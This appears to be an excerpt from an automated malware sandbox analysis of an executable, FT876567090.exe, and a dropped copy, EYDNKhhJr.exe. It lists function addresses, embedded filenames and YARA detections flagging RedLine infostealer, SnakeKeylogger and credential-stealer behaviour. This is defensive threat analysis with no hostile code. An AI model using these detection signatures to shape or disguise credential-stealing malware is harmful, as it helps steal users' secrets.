Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 12_2_07418090	12_2_07418090
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DD20B	15_2_030DD20B
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DD7B8	15_2_030DD7B8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DA598	15_2_030DA598
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DD4EB	15_2_030DD4EB
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030D74E0	15_2_030D74E0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DC4E0	15_2_030DC4E0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DC980	15_2_030DC980
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030D586F	15_2_030D586F
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DCF30	15_2_030DCF30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030D6EA8	15_2_030D6EA8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DEEE0	15_2_030DEEE0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DCC58	15_2_030DCC58
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030D4311	15_2_030D4311
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DC6A8	15_2_030DC6A8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DFBA8	15_2_030DFBA8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030DEED0	15_2_030DEED0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_030D2EF8	15_2_030D2EF8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F69578	15_2_05F69578
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F65048	15_2_05F65048
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F69C48	15_2_05F69C48
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D9D8	15_2_05F6D9D8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D9C8	15_2_05F6D9C8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F62580	15_2_05F62580
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D580	15_2_05F6D580
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F62577	15_2_05F62577
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D570	15_2_05F6D570
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D128	15_2_05F6D128
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6D119	15_2_05F6D119
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6CCD0	15_2_05F6CCD0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6CCC0	15_2_05F6CCC0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6FC98	15_2_05F6FC98
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F60040	15_2_05F60040
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6F840	15_2_05F6F840
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6F831	15_2_05F6F831
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6503C	15_2_05F6503C
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F60007	15_2_05F60007
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6F3E8	15_2_05F6F3E8
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6F3D7	15_2_05F6F3D7
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F68BC0	15_2_05F68BC0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F617B0	15_2_05F617B0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F68BB1	15_2_05F68BB1
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6EF90	15_2_05F6EF90
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6179F	15_2_05F6179F
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6EF80	15_2_05F6EF80
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F69358	15_2_05F69358
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F60B30	15_2_05F60B30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6EB38	15_2_05F6EB38
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F60B23	15_2_05F60B23
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6EB29	15_2_05F6EB29
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6E6E0	15_2_05F6E6E0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6E6D0	15_2_05F6E6D0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F61E98	15_2_05F61E98
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F61E8B	15_2_05F61E8B
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6E288	15_2_05F6E288
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6E279	15_2_05F6E279
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6DE30	15_2_05F6DE30
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_05F6DE1F	15_2_05F6DE1F
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_07366490	15_2_07366490
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_0736BE18	15_2_0736BE18
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_0736356C	15_2_0736356C
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_07364DE0	15_2_07364DE0
Source: C:\Users\user\AppData\Roaming\EYDNKhhJr.exe	Code function: 15_2_07365038	15_2_07365038

Source: C:\Users\user\Desktop\FT876567090.exe

Code function: String function: 0040E1D8 appears 44 times

Source: FT876567090.exe, 00000000.00000002.2186517924.0000000006D8E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePowerShell.EXEj% vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2180274633.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2180274633.0000000004234000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2173814458.0000000000BEE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2186456709.0000000006D40000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000000.2138711938.00000000006D0000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameXtqX.exe, vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2180274633.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2180274633.00000000039C9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameArthur.dll" vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2190929165.000000000A2C0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs FT876567090.exe
Source: FT876567090.exe, 00000000.00000002.2179357230.0000000002BF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FT876567090.exe
Source: FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FT876567090.exe
Source: FT876567090.exe, 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs FT876567090.exe
Source: FT876567090.exe, 0000000A.00000002.3387112013.0000000000BD6000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs FT876567090.exe
Source: FT876567090.exe, 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAubriella.exe4 vs FT876567090.exe
Source: FT876567090.exe, 0000000A.00000002.3389715917.0000000002BB8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_.dll4 vs FT876567090.exe
Source: FT876567090.exe	Binary or memory string: OriginalFilenameXtqX.exe, vs FT876567090.exe

Source: FT876567090.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 12.2.EYDNKhhJr.exe.448c7b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FT876567090.exe.45117a8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FT876567090.exe.39f4448.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.EYDNKhhJr.exe.4459990.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FT876567090.exe.45117a8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 12.2.EYDNKhhJr.exe.4459990.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.2f20000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.FT876567090.exe.5560000.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FT876567090.exe.449a788.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.EYDNKhhJr.exe.2f9fd66.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.FT876567090.exe.2f20000.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.FT876567090.exe.2f20f20.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 15.2.EYDNKhhJr.exe.2fa0c86.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.FT876567090.exe.4423768.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3390860083.0000000002F20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000F.00000002.3388385151.0000000002F5F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000A.00000002.3400445756.0000000005560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: Process Memory Space: FT876567090.exe PID: 8124, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: EYDNKhhJr.exe PID: 3704, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: FT876567090.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: EYDNKhhJr.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, -k.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.FT876567090.exe.2f20f20.2.raw.unpack, -cA-.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 10.2.FT876567090.exe.5560000.3.raw.unpack, -k.cs	Cryptographic APIs: 'TransformFinalBlock'
